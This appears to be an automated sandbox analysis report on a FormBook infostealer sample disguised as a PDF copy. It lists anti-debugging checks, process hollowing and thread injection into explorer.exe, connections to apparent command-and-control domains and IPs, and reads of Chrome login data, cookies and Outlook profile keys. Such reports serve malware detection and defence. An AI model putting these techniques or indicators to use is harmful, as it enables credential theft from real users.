          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31C06 mov eax, dword ptr fs:[00000030h]3_2_00B31C06
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B4740D mov eax, dword ptr fs:[00000030h]3_2_00B4740D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B4740D mov eax, dword ptr fs:[00000030h]3_2_00B4740D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B4740D mov eax, dword ptr fs:[00000030h]3_2_00B4740D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9746D mov eax, dword ptr fs:[00000030h]3_2_00A9746D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0C450 mov eax, dword ptr fs:[00000030h]3_2_00B0C450
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0C450 mov eax, dword ptr fs:[00000030h]3_2_00B0C450
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAA44B mov eax, dword ptr fs:[00000030h]3_2_00AAA44B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA35A1 mov eax, dword ptr fs:[00000030h]3_2_00AA35A1
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B405AC mov eax, dword ptr fs:[00000030h]3_2_00B405AC
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B405AC mov eax, dword ptr fs:[00000030h]3_2_00B405AC
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AA1DB5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AA1DB5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]3_2_00AA1DB5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA2581 mov eax, dword ptr fs:[00000030h]3_2_00AA2581
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA2581 mov eax, dword ptr fs:[00000030h]3_2_00AA2581
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA2581 mov eax, dword ptr fs:[00000030h]3_2_00AA2581
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA2581 mov eax, dword ptr fs:[00000030h]3_2_00AA2581
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A72D8A mov eax, dword ptr fs:[00000030h]3_2_00A72D8A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A72D8A mov eax, dword ptr fs:[00000030h]3_2_00A72D8A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A72D8A mov eax, dword ptr fs:[00000030h]3_2_00A72D8A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A72D8A mov eax, dword ptr fs:[00000030h]3_2_00A72D8A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A72D8A mov eax, dword ptr fs:[00000030h]3_2_00A72D8A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAFD9B mov eax, dword ptr fs:[00000030h]3_2_00AAFD9B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAFD9B mov eax, dword ptr fs:[00000030h]3_2_00AAFD9B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B28DF1 mov eax, dword ptr fs:[00000030h]3_2_00B28DF1
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A8D5E0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A8D5E0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B3FDE2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B3FDE2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B3FDE2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]3_2_00B3FDE2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AF6DC9
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AF6DC9
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AF6DC9
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]3_2_00AF6DC9
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AF6DC9
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]3_2_00AF6DC9
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B48D34 mov eax, dword ptr fs:[00000030h]3_2_00B48D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3E539 mov eax, dword ptr fs:[00000030h]3_2_00B3E539
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA4D3B mov eax, dword ptr fs:[00000030h]3_2_00AA4D3B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA4D3B mov eax, dword ptr fs:[00000030h]3_2_00AA4D3B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA4D3B mov eax, dword ptr fs:[00000030h]3_2_00AA4D3B
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7AD30 mov eax, dword ptr fs:[00000030h]3_2_00A7AD30
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AFA537 mov eax, dword ptr fs:[00000030h]3_2_00AFA537
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A83D34 mov eax, dword ptr fs:[00000030h]3_2_00A83D34
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9C577 mov eax, dword ptr fs:[00000030h]3_2_00A9C577
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9C577 mov eax, dword ptr fs:[00000030h]3_2_00A9C577
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB3D43 mov eax, dword ptr fs:[00000030h]3_2_00AB3D43
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF3540 mov eax, dword ptr fs:[00000030h]3_2_00AF3540
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A97D50 mov eax, dword ptr fs:[00000030h]3_2_00A97D50
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF46A7 mov eax, dword ptr fs:[00000030h]3_2_00AF46A7
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B40EA5 mov eax, dword ptr fs:[00000030h]3_2_00B40EA5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B40EA5 mov eax, dword ptr fs:[00000030h]3_2_00B40EA5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B40EA5 mov eax, dword ptr fs:[00000030h]3_2_00B40EA5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0FE87 mov eax, dword ptr fs:[00000030h]3_2_00B0FE87
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]3_2_00AA16E0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A876E2 mov eax, dword ptr fs:[00000030h]3_2_00A876E2
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B48ED6 mov eax, dword ptr fs:[00000030h]3_2_00B48ED6
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA36CC mov eax, dword ptr fs:[00000030h]3_2_00AA36CC
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]3_2_00AB8EC7
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]3_2_00B2FEC0
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7E620 mov eax, dword ptr fs:[00000030h]3_2_00A7E620
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B2FE3F mov eax, dword ptr fs:[00000030h]3_2_00B2FE3F
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7C600 mov eax, dword ptr fs:[00000030h]3_2_00A7C600
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7C600 mov eax, dword ptr fs:[00000030h]3_2_00A7C600
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A7C600 mov eax, dword ptr fs:[00000030h]3_2_00A7C600
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AA8E00 mov eax, dword ptr fs:[00000030h]3_2_00AA8E00
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAA61C mov eax, dword ptr fs:[00000030h]3_2_00AAA61C
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAA61C mov eax, dword ptr fs:[00000030h]3_2_00AAA61C
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B31608 mov eax, dword ptr fs:[00000030h]3_2_00B31608
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8766D mov eax, dword ptr fs:[00000030h]3_2_00A8766D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9AE73 mov eax, dword ptr fs:[00000030h]3_2_00A9AE73
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9AE73 mov eax, dword ptr fs:[00000030h]3_2_00A9AE73
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9AE73 mov eax, dword ptr fs:[00000030h]3_2_00A9AE73
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9AE73 mov eax, dword ptr fs:[00000030h]3_2_00A9AE73
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9AE73 mov eax, dword ptr fs:[00000030h]3_2_00A9AE73
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A87E41 mov eax, dword ptr fs:[00000030h]3_2_00A87E41
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A87E41 mov eax, dword ptr fs:[00000030h]3_2_00A87E41
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A87E41 mov eax, dword ptr fs:[00000030h]3_2_00A87E41
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A87E41 mov eax, dword ptr fs:[00000030h]3_2_00A87E41
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A87E41 mov eax, dword ptr fs:[00000030h]3_2_00A87E41
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A87E41 mov eax, dword ptr fs:[00000030h]3_2_00A87E41
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3AE44 mov eax, dword ptr fs:[00000030h]3_2_00B3AE44
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B3AE44 mov eax, dword ptr fs:[00000030h]3_2_00B3AE44
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF7794 mov eax, dword ptr fs:[00000030h]3_2_00AF7794
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF7794 mov eax, dword ptr fs:[00000030h]3_2_00AF7794
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AF7794 mov eax, dword ptr fs:[00000030h]3_2_00AF7794
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A88794 mov eax, dword ptr fs:[00000030h]3_2_00A88794
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AB37F5 mov eax, dword ptr fs:[00000030h]3_2_00AB37F5
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A74F2E mov eax, dword ptr fs:[00000030h]3_2_00A74F2E
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A74F2E mov eax, dword ptr fs:[00000030h]3_2_00A74F2E
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAE730 mov eax, dword ptr fs:[00000030h]3_2_00AAE730
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0FF10 mov eax, dword ptr fs:[00000030h]3_2_00B0FF10
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B0FF10 mov eax, dword ptr fs:[00000030h]3_2_00B0FF10
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAA70E mov eax, dword ptr fs:[00000030h]3_2_00AAA70E
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00AAA70E mov eax, dword ptr fs:[00000030h]3_2_00AAA70E
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B4070D mov eax, dword ptr fs:[00000030h]3_2_00B4070D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B4070D mov eax, dword ptr fs:[00000030h]3_2_00B4070D
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A9F716 mov eax, dword ptr fs:[00000030h]3_2_00A9F716
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8FF60 mov eax, dword ptr fs:[00000030h]3_2_00A8FF60
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00B48F6A mov eax, dword ptr fs:[00000030h]3_2_00B48F6A
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_00A8EF40 mov eax, dword ptr fs:[00000030h]3_2_00A8EF40
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 3_2_0040CFB3 LdrLoadDll,3_2_0040CFB3
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_00401982 SetUnhandledExceptionFilter,1_2_00401982
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_00401820 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401820
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_00401C83 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00401C83
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_00404EC2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00404EC2

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.150 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 85.187.128.34 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.smirnovmir.online
          Source: C:\Windows\explorer.exeDomain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 69.172.75.142 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.81 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.eylien.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.231.66.204 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.pgatraining.com
          Source: C:\Windows\explorer.exeDomain query: www.solscape.org
          Source: C:\Windows\explorer.exeNetwork Connect: 145.239.252.49 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.paystiky.site
          Source: C:\Windows\explorer.exeDomain query: www.laksiricargo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.66 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.32.200.254 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dammar.net
          Source: C:\Windows\explorer.exeDomain query: www.wellblech.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 45.136.196.215 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.no-leaks.com
          Source: C:\Windows\explorer.exeDomain query: www.deconsurveys.com
          Source: C:\Windows\explorer.exeDomain query: www.goosedigitals.com
          Source: C:\Windows\explorer.exeNetwork Connect: 173.199.124.126 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 156.226.207.81 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.studioweiden.click
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lozpw.space
          Source: C:\Windows\explorer.exeDomain query: www.coolconnect.online
          Source: C:\Windows\explorer.exeNetwork Connect: 185.134.245.113 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.58.112.174 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hexiemoju.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeSection unmapped: C:\Windows\System32\conhost.exe base address: E60000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\gkvlc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeSection loaded: unknown target: C:\Windows\System32\conhost.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeSection loaded: unknown target: C:\Windows\System32\conhost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeProcess created: C:\Users\user\AppData\Local\Temp\gkvlc.exe C:\Users\user\AppData\Local\Temp\gkvlc.exeJump to behavior
          Source: explorer.exe, 00000004.00000000.270767929.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
          Source: explorer.exe, 00000004.00000003.461687852.0000000008356000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.274515961.0000000005D90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.270767929.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.269932731.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.270767929.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.270767929.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_00401A95 cpuid 1_2_00401A95
          Source: C:\Users\user\AppData\Local\Temp\gkvlc.exeCode function: 1_2_00401707 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00401707
          Source: C:\Users\user\Desktop\TTCopy-240323-PDF.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.gkvlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.gkvlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.gkvlc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.gkvlc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.775882995.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.775538057.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.307010756.00000000005E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.775075020.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.306629173.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		1
          Input Capture          		2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
